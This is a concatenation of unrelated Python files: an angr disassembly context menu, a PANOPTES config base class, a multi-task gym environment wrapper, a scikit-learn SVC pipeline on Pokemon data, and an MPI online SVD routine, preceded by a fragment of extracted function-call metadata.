'vertices.circle', 'vertices.circle', (['self.inner_diameter'], {}), '(self.inner_diameter)\n', (24312, 24333), False, 'import vertices\n'), ((24415, 24451), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (24439, 24451), False, 'import vertices\n'), ((25231, 25267), 'vertices.circle', 'vertices.circle', (['self.outer_diameter'], {}), '(self.outer_diameter)\n', (25246, 25267), False, 'import vertices\n'), ((25375, 25411), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (25399, 25411), False, 'import vertices\n'), ((26126, 26152), 'numpy.array', 'np.array', (['self.coordinates'], {}), '(self.coordinates)\n', (26134, 26152), True, 'import numpy as np\n'), ((26198, 
26227), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (26222, 26227), False, 'import vertices\n'), ((26719, 26739), 'copy.copy', 'copy.copy', (['transform'], {}), '(transform)\n', (26728, 26739), False, 'import copy\n'), ((27625, 27686), 'vertices.rounded_line', 'vertices.rounded_line', (['self.aperture.diameter', 'x0', 'y0', 'x1', 'y1'], {}), '(self.aperture.diameter, x0, y0, x1, y1)\n', (27646, 27686), False, 'import vertices\n'), ((27705, 27734), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (27729, 27734), False, 'import vertices\n'), ((28655, 28723), 'vertices.rounded_arc', 'vertices.rounded_arc', (['self.aperture.diameter', 'x0', 'y0', 'x1', 'y1', 'x2', 'y2'], {}), '(self.aperture.diameter, x0, y0, x1, y1, x2, y2)\n', (28675, 28723), False, 'import vertices\n'), ((28732, 28763), 'vertices.translate', 'vertices.translate', (['pts', 'x0', 'y0'], {}), '(pts, x0, y0)\n', (28750, 28763), False, 'import vertices\n'), ((28782, 28811), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (28806, 28811), False, 'import vertices\n'), ((3279, 3316), 're.search', 're.search', (['"""[GDM](\\\\d\\\\d)"""', 'statement'], {}), "('[GDM](\\\\d\\\\d)', statement)\n", (3288, 3316), False, 'import re\n'), ((13561, 13629), 're.search', 're.search', (['f"""%SRX(\\\\d+)Y(\\\\d+)I({RE_DEC})J({RE_DEC})\\\\*%"""', 'statement'], {}), "(f'%SRX(\\\\d+)Y(\\\\d+)I({RE_DEC})J({RE_DEC})\\\\*%', statement)\n", (13570, 13629), False, 'import re\n'), ((14872, 14907), 'vertices.circle', 'vertices.circle', (['self.hole_diameter'], {}), '(self.hole_diameter)\n', (14887, 14907), False, 'import vertices\n'), ((14931, 14951), 'numpy.flip', 'np.flip', (['hole_pts', '(0)'], {}), '(hole_pts, 0)\n', (14938, 14951), True, 'import numpy as np\n'), ((24351, 24371), 'numpy.flip', 'np.flip', (['hole_pts', '(0)'], {}), '(hole_pts, 0)\n', (24358, 24371), True, 'import numpy as np\n'), ((25285, 25321), 
'vertices.circle', 'vertices.circle', (['self.inner_diameter'], {}), '(self.inner_diameter)\n', (25300, 25321), False, 'import vertices\n'), ((27540, 27561), 'numpy.array', 'np.array', (['self.origin'], {}), '(self.origin)\n', (27548, 27561), True, 'import numpy as np\n'), ((27587, 27610), 'numpy.array', 'np.array', (['self.endpoint'], {}), '(self.endpoint)\n', (27595, 27610), True, 'import numpy as np\n'), ((28489, 28510), 'numpy.array', 'np.array', (['self.offset'], {}), '(self.offset)\n', (28497, 28510), True, 'import numpy as np\n'), ((28536, 28557), 'numpy.array', 'np.array', (['self.origin'], {}), '(self.origin)\n', (28544, 28557), True, 'import numpy as np\n'), ((28583, 28606), 'numpy.array', 'np.array', (['self.endpoint'], {}), '(self.endpoint)\n', (28591, 28606), True, 'import numpy as np\n'), ((29287, 29308), 'numpy.array', 'np.array', (['self.origin'], {}), '(self.origin)\n', (29295, 29308), True, 'import numpy as np\n'), ((18877, 18919), 're.search', 're.search', (['"""\\\\$(\\\\d+)\\\\s*=([^*]+)*"""', 'block'], {}), "('\\\\$(\\\\d+)\\\\s*=([^*]+)*', block)\n", (18886, 18919), False, 'import re\n'), ((19398, 19425), 're.search', 're.search', (['"""\\\\$\\\\d+"""', 'block'], {}), "('\\\\$\\\\d+', block)\n", (19407, 19425), False, 'import re\n')] |
from functools import partial
from typing import Callable
from typing import TYPE_CHECKING
from ...config import Conf
from .menu import Menu, MenuEntry, MenuSeparator
if TYPE_CHECKING:
from ...ui.views.disassembly_view import DisassemblyView
class DisasmInsnContextMenu(Menu):
    """
    Dissembly Instruction's Context Menu Items and callback funcion.

    It provides context menu for dissembly instructions in the Dissembly View.

    For adding items in plugins, use `Workspace.add_disasm_insn_ctx_menu_entry`
    and `Workspace.remove_disasm_insn_ctx_menu_entry`.
    """

    def __init__(self, disasm_view: 'DisassemblyView'):
        super().__init__("", parent=disasm_view)
        # Address of the instruction the menu was opened on; set by the view.
        self.insn_addr = None
        self.entries.extend([
            MenuEntry('T&oggle selection', self._toggle_instruction_selection),
            MenuSeparator(),
            MenuEntry('&XRefs...', self._popup_xrefs),
            MenuSeparator(),
        ])
        if Conf.has_operation_mango:
            self.entries.extend([
                MenuEntry("&Depends on...", self._popup_dependson_dialog),
                MenuSeparator(),
            ])
        self.entries.extend([
            MenuEntry('E&xecute symbolically...', self._popup_newstate_dialog),
            MenuEntry('&Avoid in execution...', self._avoid_in_execution),
            MenuEntry('&Find in execution...', self._find_in_execution),
            MenuEntry('Add &hook...', self._add_hook),
            MenuEntry('View function &documentation...', self._view_docs)
        ])

    @property
    def _disasm_view(self) -> 'DisassemblyView':
        """The owning disassembly view (stored as the Qt parent)."""
        return self.parent

    def _popup_newstate_dialog(self):
        self._disasm_view.popup_newstate_dialog(async_=True)

    def _popup_dependson_dialog(self):
        self._disasm_view.popup_dependson_dialog(use_operand=True)

    def _toggle_instruction_selection(self):
        self._disasm_view.infodock.toggle_instruction_selection(self.insn_addr)

    def _avoid_in_execution(self):
        self._disasm_view.avoid_addr_in_exec(self.insn_addr)
        self._disasm_view.refresh()

    def _find_in_execution(self):
        self._disasm_view.find_addr_in_exec(self.insn_addr)
        self._disasm_view.refresh()

    def _add_hook(self):
        self._disasm_view.popup_hook_dialog(async_=True)

    def _view_docs(self):
        if self._disasm_view is None:
            return
        addr = self._disasm_view._address_in_selection()
        if addr is not None:
            self._disasm_view.popup_func_doc_dialog(addr)

    def _popup_xrefs(self):
        if self._disasm_view is None or self._disasm_view._flow_graph is None:
            return
        r = self._disasm_view._flow_graph.get_selected_operand_info()
        if r is not None:
            _, ins_addr, operand = r
            self._disasm_view.parse_operand_and_popup_xref_dialog(ins_addr, operand, async_=True)

    #
    # Public Methods
    #

    def add_menu_entry(self, text, callback: Callable[['DisasmInsnContextMenu'], None], add_separator_first=True):
        """Append a plugin menu entry; the callback receives this menu instance."""
        if add_separator_first:
            self.entries.append(MenuSeparator())
        self.entries.append(MenuEntry(text, partial(callback, self)))

    def remove_menu_entry(self, text, remove_preceding_separator=True):
        """Remove the first menu entry whose caption matches *text*.

        Bug fix: the previous version kept iterating (and mutating) the
        entries list after removal, which could skip or remove extra
        entries, and when the match sat at index 0, ``pop(idx - 1)`` was
        ``pop(-1)`` and removed the *last* entry. The scan now stops
        after the first match and only removes a directly preceding
        MenuSeparator.
        """
        for idx, m in enumerate(self.entries):
            if not isinstance(m, MenuEntry):
                continue
            if m.caption == text:
                self.entries.remove(m)
                if (remove_preceding_separator and idx > 0
                        and isinstance(self.entries[idx - 1], MenuSeparator)):
                    self.entries.pop(idx - 1)
                return
| [
"functools.partial"
] | [((3178, 3201), 'functools.partial', 'partial', (['callback', 'self'], {}), '(callback, self)\n', (3185, 3201), False, 'from functools import partial\n')] |
from requests.exceptions import ConnectionError
from panoptes.pocs import __version__
from panoptes.utils.database import PanDB
from panoptes.utils.config import client
from panoptes.pocs.utils.logger import get_logger
from panoptes.pocs import hardware
# Global database.
PAN_DB_OBJ = None
class PanBase(object):
""" Base class for other classes within the PANOPTES ecosystem
Defines common properties for each class (e.g. logger, config, db).
"""
def __init__(self, config_port='6563', *args, **kwargs):
self.__version__ = __version__
self._config_port = config_port
self.logger = get_logger()
# If the user requests a db_type then update runtime config
db_type = kwargs.get('db_type', self.get_config('db.type', default='file'))
db_name = kwargs.get('db_name', self.get_config('db.name', default='panoptes'))
global PAN_DB_OBJ
if PAN_DB_OBJ is None:
PAN_DB_OBJ = PanDB(db_type=db_type, db_name=db_name)
self.db = PAN_DB_OBJ
def get_config(self, *args, **kwargs):
"""Thin-wrapper around client based get_config that sets default port.
See `panoptes.utils.config.client.get_config` for more information.
Args:
*args: Passed to get_config
**kwargs: Passed to get_config
"""
config_value = None
try:
config_value = client.get_config(port=self._config_port, *args, **kwargs)
except ConnectionError as e: # pragma: no cover
self.logger.critical(f'Cannot connect to config_server from {self.__class__}: {e!r}')
return config_value
def set_config(self, key, new_value, *args, **kwargs):
"""Thin-wrapper around client based set_config that sets default port.
See `panoptes.utils.config.client.set_config` for more information.
Args:
key (str): The key name to use, can be namespaced with dots.
new_value (any): The value to store.
*args: Passed to set_config
**kwargs: Passed to set_config
"""
config_value = None
if key == 'simulator' and new_value == 'all':
# Don't use hardware.get_simulator_names because it checks config.
new_value = hardware.ALL_NAMES
try:
self.logger.trace(f'Setting config {key=} {new_value=}')
config_value = client.set_config(key, new_value, port=self._config_port, *args,
**kwargs)
self.logger.trace(f'Config set {config_value=}')
except ConnectionError as e: # pragma: no cover
self.logger.critical(f'Cannot connect to config_server from {self.__class__}: {e!r}')
return config_value
| [
"panoptes.utils.config.client.get_config",
"panoptes.utils.database.PanDB",
"panoptes.utils.config.client.set_config",
"panoptes.pocs.utils.logger.get_logger"
] | [((631, 643), 'panoptes.pocs.utils.logger.get_logger', 'get_logger', ([], {}), '()\n', (641, 643), False, 'from panoptes.pocs.utils.logger import get_logger\n'), ((968, 1007), 'panoptes.utils.database.PanDB', 'PanDB', ([], {'db_type': 'db_type', 'db_name': 'db_name'}), '(db_type=db_type, db_name=db_name)\n', (973, 1007), False, 'from panoptes.utils.database import PanDB\n'), ((1416, 1474), 'panoptes.utils.config.client.get_config', 'client.get_config', (['*args'], {'port': 'self._config_port'}), '(*args, port=self._config_port, **kwargs)\n', (1433, 1474), False, 'from panoptes.utils.config import client\n'), ((2422, 2496), 'panoptes.utils.config.client.set_config', 'client.set_config', (['key', 'new_value', '*args'], {'port': 'self._config_port'}), '(key, new_value, *args, port=self._config_port, **kwargs)\n', (2439, 2496), False, 'from panoptes.utils.config import client\n')] |
"""A wrapper env that handles multiple tasks from different envs.
Useful while training multi-task reinforcement learning algorithms.
It provides observations augmented with one-hot representation of tasks.
"""
import random
import akro
import gym
import numpy as np
def round_robin_strategy(num_tasks, last_task=None):
"""A function for sampling tasks in round robin fashion.
Args:
num_tasks (int): Total number of tasks.
last_task (int): Previously sampled task.
Returns:
int: task id.
"""
if last_task is None:
return 0
return (last_task + 1) % num_tasks
def uniform_random_strategy(num_tasks, _):
"""A function for sampling tasks uniformly at random.
Args:
num_tasks (int): Total number of tasks.
_ (object): Ignored by this sampling strategy.
Returns:
int: task id.
"""
return random.randint(0, num_tasks - 1)
class MultiEnvWrapper(gym.Wrapper):
"""A wrapper class to handle multiple gym environments.
Args:
envs (list(gym.Env)):
A list of objects implementing gym.Env.
sample_strategy (function(int, int)):
Sample strategy to be used when sampling a new task.
"""
def __init__(self, envs, task_name=None, sample_strategy=uniform_random_strategy):
self._sample_strategy = sample_strategy
self._num_tasks = len(envs)
self._active_task_index = None
self._observation_space = None
self._envs_names_list = task_name or dict()
max_flat_dim = np.prod(envs[0].observation_space.shape)
for i, env in enumerate(envs):
assert len(env.observation_space.shape) == 1
if np.prod(env.observation_space.shape) >= max_flat_dim:
self.max_observation_space_index = i
max_flat_dim = np.prod(env.observation_space.shape)
self._max_plain_dim = max_flat_dim
super().__init__(envs[self.max_observation_space_index])
self._task_envs = []
for env in envs:
if env.action_space.shape != self.env.action_space.shape:
raise ValueError('Action space of all envs should be same.')
self._task_envs.append(env)
self.spec.observation_space = self.observation_space
@property
def num_tasks(self):
"""Total number of tasks.
Returns:
int: number of tasks.
"""
return len(self._task_envs)
@property
def task_space(self):
"""Task Space.
Returns:
akro.Box: Task space.
"""
one_hot_ub = np.ones(self.num_tasks)
one_hot_lb = np.zeros(self.num_tasks)
return akro.Box(one_hot_lb, one_hot_ub)
@property
def active_task_index(self):
"""Index of active task env.
Returns:
int: Index of active task.
"""
return self._active_task_index
@property
def observation_space(self):
"""Observation space.
Returns:
akro.Box: Observation space.
"""
task_lb, task_ub = self.task_space.bounds
env_lb, env_ub = self._observation_space.bounds
return akro.Box(np.concatenate([task_lb, env_lb]),
np.concatenate([task_ub, env_ub]))
@observation_space.setter
def observation_space(self, observation_space):
"""Observation space setter.
Args:
observation_space (akro.Box): Observation space.
"""
self._observation_space = observation_space
@property
def active_task_one_hot(self):
"""One-hot representation of active task.
Returns:
numpy.ndarray: one-hot representation of active task
"""
one_hot = np.zeros(self.task_space.shape)
index = self.active_task_index or 0
one_hot[index] = self.task_space.high[index]
return one_hot
def reset(self, **kwargs):
"""Sample new task and call reset on new task env.
Args:
kwargs (dict): Keyword arguments to be passed to gym.Env.reset
Returns:
numpy.ndarray: active task one-hot representation + observation
"""
self._active_task_index = self._sample_strategy(
self._num_tasks, self._active_task_index)
self.env = self._task_envs[self._active_task_index]
obs = self.env.reset(**kwargs)
obs = self._augment_observation(obs)
oh_obs = self._obs_with_one_hot(obs)
return oh_obs
def _augment_observation(self, obs):
# optionally zero-pad observation
if np.prod(obs.shape) < self._max_plain_dim:
zeros = np.zeros(
shape=(self._max_plain_dim - np.prod(obs.shape),)
)
obs = np.concatenate([obs, zeros])
return obs
def step(self, action):
"""gym.Env step for the active task env.
Args:
action (object): object to be passed in gym.Env.reset(action)
Returns:
object: agent's observation of the current environment
float: amount of reward returned after previous action
bool: whether the episode has ended
dict: contains auxiliary diagnostic information
"""
obs, reward, done, info = self.env.step(action)
obs = self._augment_observation(obs)
oh_obs = self._obs_with_one_hot(obs)
info['task_id'] = self._active_task_index
info['task_name'] = self._envs_names_list[self._active_task_index]
return oh_obs, reward, done, info
def close(self):
"""Close all task envs."""
for env in self._task_envs:
env.close()
def _obs_with_one_hot(self, obs):
"""Concatenate active task one-hot representation with observation.
Args:
obs (numpy.ndarray): observation
Returns:
numpy.ndarray: active task one-hot + observation
"""
oh_obs = np.concatenate([self.active_task_one_hot, obs])
return oh_obs
# """A wrapper env that handles multiple tasks from different envs.
# Useful while training multi-task reinforcement learning algorithms.
# It provides observations augmented with one-hot representation of tasks.
# """
# import random
# import akro
# import gym
# import numpy as np
# def round_robin_strategy(num_tasks, last_task=None):
# """A function for sampling tasks in round robin fashion.
# Args:
# num_tasks (int): Total number of tasks.
# last_task (int): Previously sampled task.
# Returns:
# int: task id.
# """
# if last_task is None:
# return 0
# return (last_task + 1) % num_tasks
# def uniform_random_strategy(num_tasks, _):
# """A function for sampling tasks uniformly at random.
# Args:
# num_tasks (int): Total number of tasks.
# _ (object): Ignored by this sampling strategy.
# Returns:
# int: task id.
# """
# return random.randint(0, num_tasks - 1)
# class MultiEnvWrapper(gym.Wrapper):
# """A wrapper class to handle multiple gym environments.
# Args:
# envs (list(gym.Env)):
# A list of objects implementing gym.Env.
# sample_strategy (function(int, int)):
# Sample strategy to be used when sampling a new task.
# """
# def __init__(self, envs, sample_strategy=uniform_random_strategy):
# self._sample_strategy = sample_strategy
# self._num_tasks = len(envs)
# self._active_task_index = None
# self._observation_space = None
# max_flat_dim = np.prod(envs[0].observation_space.shape)
# max_observation_space_index = 0
# for i, env in enumerate(envs):
# assert len(env.observation_space.shape) == 1
# if np.prod(env.observation_space.shape) >= max_flat_dim:
# self.max_observation_space_index = i
# max_flat_dim = np.prod(env.observation_space.shape)
# self._max_plain_dim = max_flat_dim
# super().__init__(envs[self.max_observation_space_index])
# self._task_envs = []
# for i, env in enumerate(envs):
# if env.action_space.shape != self.env.action_space.shape:
# raise ValueError('Action space of all envs should be same.')
# self._task_envs.append(env)
# self.env.spec.observation_space = self._task_envs[self.max_observation_space_index].observation_space
# @property
# def num_tasks(self):
# """Total number of tasks.
# Returns:
# int: number of tasks.
# """
# return len(self._task_envs)
# @property
# def task_space(self):
# """Task Space.
# Returns:
# akro.Box: Task space.
# """
# one_hot_ub = np.ones(self.num_tasks)
# one_hot_lb = np.zeros(self.num_tasks)
# return akro.Box(one_hot_lb, one_hot_ub)
# @property
# def active_task_index(self):
# """Index of active task env.
# Returns:
# int: Index of active task.
# """
# return self._active_task_index
# @property
# def observation_space(self):
# """Observation space.
# Returns:
# akro.Box: Observation space.
# """
# task_lb, task_ub = self.task_space.bounds
# env_lb, env_ub = self._observation_space.bounds
# return akro.Box(np.concatenate([task_lb, env_lb]),
# np.concatenate([task_ub, env_ub]))
# @observation_space.setter
# def observation_space(self, observation_space):
# """Observation space setter.
# Args:
# observation_space (akro.Box): Observation space.
# """
# self._observation_space = observation_space
# @property
# def active_task_one_hot(self):
# """One-hot representation of active task.
# Returns:
# numpy.ndarray: one-hot representation of active task
# """
# one_hot = np.zeros(self.task_space.shape)
# index = self.active_task_index or 0
# one_hot[index] = self.task_space.high[index]
# return one_hot
# def reset(self, **kwargs):
# """Sample new task and call reset on new task env.
# Args:
# kwargs (dict): Keyword arguments to be passed to gym.Env.reset
# Returns:
# numpy.ndarray: active task one-hot representation + observation
# """
# self._active_task_index = self._sample_strategy(
# self._num_tasks, self._active_task_index)
# self.env = self._task_envs[self._active_task_index]
# obs = self.env.reset(**kwargs)
# obs = self._augment_observation(obs)
# oh_obs = self._obs_with_one_hot(obs)
# return oh_obs
# def step(self, action):
# """gym.Env step for the active task env.
# Args:
# action (object): object to be passed in gym.Env.reset(action)
# Returns:
# object: agent's observation of the current environment
# float: amount of reward returned after previous action
# bool: whether the episode has ended
# dict: contains auxiliary diagnostic information
# """
# obs, reward, done, info = self.env.step(action)
# obs = self._augment_observation(obs)
# oh_obs = self._obs_with_one_hot(obs)
# info['task_id'] = self._active_task_index
# return oh_obs, reward, done, info
# def _augment_observation(self, obs):
# # optionally zero-pad observation
# if np.prod(obs.shape) < self._max_plain_dim:
# zeros = np.zeros(
# shape=(self._max_plain_dim - np.prod(obs.shape),)
# )
# obs = np.concatenate([obs, zeros])
# return obs
# def close(self):
# """Close all task envs."""
# for env in self._task_envs:
# env.close()
# def _obs_with_one_hot(self, obs):
# """Concatenate active task one-hot representation with observation.
# Args:
# obs (numpy.ndarray): observation
# Returns:
# numpy.ndarray: active task one-hot + observation
# """
# oh_obs = np.concatenate([self.active_task_one_hot, obs])
# return oh_obs
| [
"numpy.prod",
"numpy.ones",
"numpy.zeros",
"numpy.concatenate",
"akro.Box",
"random.randint"
] | [((896, 928), 'random.randint', 'random.randint', (['(0)', '(num_tasks - 1)'], {}), '(0, num_tasks - 1)\n', (910, 928), False, 'import random\n'), ((1566, 1606), 'numpy.prod', 'np.prod', (['envs[0].observation_space.shape'], {}), '(envs[0].observation_space.shape)\n', (1573, 1606), True, 'import numpy as np\n'), ((2630, 2653), 'numpy.ones', 'np.ones', (['self.num_tasks'], {}), '(self.num_tasks)\n', (2637, 2653), True, 'import numpy as np\n'), ((2675, 2699), 'numpy.zeros', 'np.zeros', (['self.num_tasks'], {}), '(self.num_tasks)\n', (2683, 2699), True, 'import numpy as np\n'), ((2715, 2747), 'akro.Box', 'akro.Box', (['one_hot_lb', 'one_hot_ub'], {}), '(one_hot_lb, one_hot_ub)\n', (2723, 2747), False, 'import akro\n'), ((3791, 3822), 'numpy.zeros', 'np.zeros', (['self.task_space.shape'], {}), '(self.task_space.shape)\n', (3799, 3822), True, 'import numpy as np\n'), ((6021, 6068), 'numpy.concatenate', 'np.concatenate', (['[self.active_task_one_hot, obs]'], {}), '([self.active_task_one_hot, obs])\n', (6035, 6068), True, 'import numpy as np\n'), ((3222, 3255), 'numpy.concatenate', 'np.concatenate', (['[task_lb, env_lb]'], {}), '([task_lb, env_lb])\n', (3236, 3255), True, 'import numpy as np\n'), ((3281, 3314), 'numpy.concatenate', 'np.concatenate', (['[task_ub, env_ub]'], {}), '([task_ub, env_ub])\n', (3295, 3314), True, 'import numpy as np\n'), ((4649, 4667), 'numpy.prod', 'np.prod', (['obs.shape'], {}), '(obs.shape)\n', (4656, 4667), True, 'import numpy as np\n'), ((4819, 4847), 'numpy.concatenate', 'np.concatenate', (['[obs, zeros]'], {}), '([obs, zeros])\n', (4833, 4847), True, 'import numpy as np\n'), ((1718, 1754), 'numpy.prod', 'np.prod', (['env.observation_space.shape'], {}), '(env.observation_space.shape)\n', (1725, 1754), True, 'import numpy as np\n'), ((1856, 1892), 'numpy.prod', 'np.prod', (['env.observation_space.shape'], {}), '(env.observation_space.shape)\n', (1863, 1892), True, 'import numpy as np\n'), ((4766, 4784), 'numpy.prod', 'np.prod', 
(['obs.shape'], {}), '(obs.shape)\n', (4773, 4784), True, 'import numpy as np\n')] |
import numpy as np
import pandas as pd
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
from sklearn.model_selection import train_test_split, cross_validate
from sklearn.preprocessing import OneHotEncoder, StandardScaler, OrdinalEncoder
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer, make_column_transformer
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.svm import SVC
# Loading in the data
pk_df = pd.read_csv('data/pokemon.csv')
train_df, test_df = train_test_split(pk_df, test_size=0.2, random_state=1)
X_train = train_df.drop(columns=['legendary'])
y_train = train_df['legendary']
X_test = test_df.drop(columns=['legendary'])
y_test = test_df['legendary']
numeric_features = ["deck_no",
"attack",
"defense" ,
"sp_attack",
"sp_defense",
"speed",
"capture_rt",
"total_bs"]
categorical_features = ["type"]
numeric_transformer = make_pipeline(SimpleImputer(strategy="median"), StandardScaler())
categorical_transformer = make_pipeline(
SimpleImputer(strategy="most_frequent"),
OneHotEncoder(handle_unknown="ignore"))
preprocessor = make_column_transformer(
(numeric_transformer, numeric_features),
(categorical_transformer, categorical_features))
# Build a pipeline containing the column transformer and an SVC model
# Use the parameter class_weight="balanced"
# Name this pipeline main_pipe
main_pipe = make_pipeline(preprocessor, SVC(class_weight="balanced"))
# Perform cross validation on the training split using the scoring measures accuracy, precision and recall
# Save the results in a dataframe named multi_scores
multi_scores = pd.DataFrame(cross_validate(main_pipe,
X_train,
y_train,
return_train_score=True,
scoring = ['accuracy', 'precision', 'recall']))
multi_scores
| [
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"sklearn.preprocessing.OneHotEncoder",
"sklearn.model_selection.cross_validate",
"sklearn.compose.make_column_transformer",
"sklearn.preprocessing.StandardScaler",
"sklearn.impute.SimpleImputer",
"warnings.simplefilter",
"sklearn.svm.SVC... | [((55, 117), 'warnings.simplefilter', 'warnings.simplefilter', ([], {'action': '"""ignore"""', 'category': 'FutureWarning'}), "(action='ignore', category=FutureWarning)\n", (76, 117), False, 'import warnings\n'), ((491, 522), 'pandas.read_csv', 'pd.read_csv', (['"""data/pokemon.csv"""'], {}), "('data/pokemon.csv')\n", (502, 522), True, 'import pandas as pd\n'), ((544, 598), 'sklearn.model_selection.train_test_split', 'train_test_split', (['pk_df'], {'test_size': '(0.2)', 'random_state': '(1)'}), '(pk_df, test_size=0.2, random_state=1)\n', (560, 598), False, 'from sklearn.model_selection import train_test_split, cross_validate\n'), ((1281, 1399), 'sklearn.compose.make_column_transformer', 'make_column_transformer', (['(numeric_transformer, numeric_features)', '(categorical_transformer, categorical_features)'], {}), '((numeric_transformer, numeric_features), (\n categorical_transformer, categorical_features))\n', (1304, 1399), False, 'from sklearn.compose import ColumnTransformer, make_column_transformer\n'), ((1082, 1114), 'sklearn.impute.SimpleImputer', 'SimpleImputer', ([], {'strategy': '"""median"""'}), "(strategy='median')\n", (1095, 1114), False, 'from sklearn.impute import SimpleImputer\n'), ((1116, 1132), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (1130, 1132), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler, OrdinalEncoder\n'), ((1180, 1219), 'sklearn.impute.SimpleImputer', 'SimpleImputer', ([], {'strategy': '"""most_frequent"""'}), "(strategy='most_frequent')\n", (1193, 1219), False, 'from sklearn.impute import SimpleImputer\n'), ((1225, 1263), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'handle_unknown': '"""ignore"""'}), "(handle_unknown='ignore')\n", (1238, 1263), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler, OrdinalEncoder\n'), ((1591, 1619), 'sklearn.svm.SVC', 'SVC', ([], {'class_weight': '"""balanced"""'}), 
"(class_weight='balanced')\n", (1594, 1619), False, 'from sklearn.svm import SVC\n'), ((1811, 1928), 'sklearn.model_selection.cross_validate', 'cross_validate', (['main_pipe', 'X_train', 'y_train'], {'return_train_score': '(True)', 'scoring': "['accuracy', 'precision', 'recall']"}), "(main_pipe, X_train, y_train, return_train_score=True,\n scoring=['accuracy', 'precision', 'recall'])\n", (1825, 1928), False, 'from sklearn.model_selection import train_test_split, cross_validate\n')] |
import numpy as np
np.random.seed(10)
import matplotlib.pyplot as plt
from mpi4py import MPI
# For shared memory deployment: `export OPENBLAS_NUM_THREADS=1`
# Method of snapshots
def generate_right_vectors(A):
'''
A - Snapshot matrix - shape: NxS
returns V - truncated right singular vectors
'''
new_mat = np.matmul(np.transpose(A),A)
w, v = np.linalg.eig(new_mat)
svals = np.sqrt(np.abs(w))
rval = np.argmax(svals<0.0001) # eps0
return v[:,:rval], np.sqrt(np.abs(w[:rval])) # Covariance eigenvectors, singular values
# Randomized SVD to accelerate
def low_rank_svd(A,K):
M = A.shape[0]
N = A.shape[1]
omega = np.random.normal(size=(N,2*K))
omega_pm = np.matmul(A,np.transpose(A))
Y = np.matmul(omega_pm,np.matmul(A,omega))
Qred, Rred = np.linalg.qr(Y)
B = np.matmul(np.transpose(Qred),A)
ustar, snew, _ = np.linalg.svd(B)
unew = np.matmul(Qred,ustar)
unew = unew[:,:K]
snew = snew[:K]
return unew, snew
# Check orthogonality
def check_ortho(modes,num_modes):
for m1 in range(num_modes):
for m2 in range(num_modes):
if m1 == m2:
s_ = np.sum(modes[:,m1]*modes[:,m2])
if not np.isclose(s_,1.0):
print('Orthogonality check failed')
break
else:
s_ = np.sum(modes[:,m1]*modes[:,m2])
if not np.isclose(s_,0.0):
print('Orthogonality check failed')
break
print('Orthogonality check passed successfully')
class online_svd_calculator(object):
"""
docstring for online_svd_calculator:
K : Number of modes to truncate
ff : Forget factor
"""
def __init__(self, K, ff, low_rank=False):
super(online_svd_calculator, self).__init__()
self.K = K
self.ff = ff
# Initialize MPI
self.comm = MPI.COMM_WORLD
self.rank = self.comm.Get_rank()
self.nprocs = self.comm.Get_size()
self.iteration = 0
self.low_rank = low_rank
# Initialize
def initialize(self, A):
self.ulocal, self.svalue = self.parallel_svd(A)
def parallel_qr(self,A):
# Perform the local QR
q, r = np.linalg.qr(A)
rlocal_shape_0 = r.shape[0]
rlocal_shape_1 = r.shape[1]
# Gather data at rank 0:
r_global = self.comm.gather(r,root=0)
# perform SVD at rank 0:
if self.rank == 0:
temp = r_global[0]
for i in range(self.nprocs-1):
temp = np.concatenate((temp,r_global[i+1]),axis=0)
r_global = temp
qglobal, rfinal = np.linalg.qr(r_global)
qglobal = -qglobal # Trick for consistency
rfinal = -rfinal
# For this rank
qlocal = np.matmul(q,qglobal[:rlocal_shape_0])
# send to other ranks
for rank in range(1,self.nprocs):
self.comm.send(qglobal[rank*rlocal_shape_0:(rank+1)*rlocal_shape_0], dest=rank, tag=rank+10)
# Step b of Levy-Lindenbaum - small operation
if self.low_rank:
# Low rank SVD
unew, snew = low_rank_svd(rfinal,self.K)
else:
unew, snew, _ = np.linalg.svd(rfinal)
else:
# Receive qglobal slices from other ranks
qglobal = self.comm.recv(source=0, tag=self.rank+10)
# For this rank
qlocal = np.matmul(q,qglobal)
# To receive new singular vectors
unew = None
snew = None
unew = self.comm.bcast(unew,root=0)
snew = self.comm.bcast(snew,root=0)
return qlocal, unew, snew
def parallel_svd(self,A):
vlocal, slocal = generate_right_vectors(A)
# Find Wr
wlocal = np.matmul(vlocal,np.diag(slocal).T)
# Gather data at rank 0:
wglobal = self.comm.gather(wlocal,root=0)
# perform SVD at rank 0:
if self.rank == 0:
temp = wglobal[0]
for i in range(self.nprocs-1):
temp = np.concatenate((temp,wglobal[i+1]),axis=-1)
wglobal = temp
if self.low_rank:
x, s = low_rank_svd(wglobal,self.K)
else:
x, s, y = np.linalg.svd(wglobal)
else:
x = None
s = None
x = self.comm.bcast(x,root=0)
s = self.comm.bcast(s,root=0)
# # Find truncation threshold
# s_ratio = np.cumsum(s)/np.sum(s)
# rval = np.argmax(1.0-s_ratio<0.0001) # eps1
# perform APMOS at each local rank
phi_local = []
for mode in range(self.K):
phi_temp = 1.0/s[mode]*np.matmul(A,x[:,mode:mode+1])
phi_local.append(phi_temp)
temp = phi_local[0]
for i in range(self.K-1):
temp = np.concatenate((temp,phi_local[i+1]),axis=-1)
return temp, s[:self.K] #
def incorporate_data(self,A):
self.iteration+=1
ll = self.ff*np.matmul(self.ulocal,np.diag(self.svalue))
ll = np.concatenate((ll,A),axis=-1)
qlocal, utemp, self.svalue = self.parallel_qr(ll)
self.ulocal = np.matmul(qlocal,utemp)
def gather_modes(self):
# Gather modes at rank 0
# This is automatically in order
phi_global = self.comm.gather(self.ulocal,root=0)
if self.rank == 0:
phi = phi_global[0]
for i in range(self.nprocs-1):
phi = np.concatenate((phi,phi_global[i+1]),axis=0)
np.save('Online_Parallel_POD.npy',phi)
np.save('Online_Parallel_SingularValues.npy',self.svalue)
# Validate
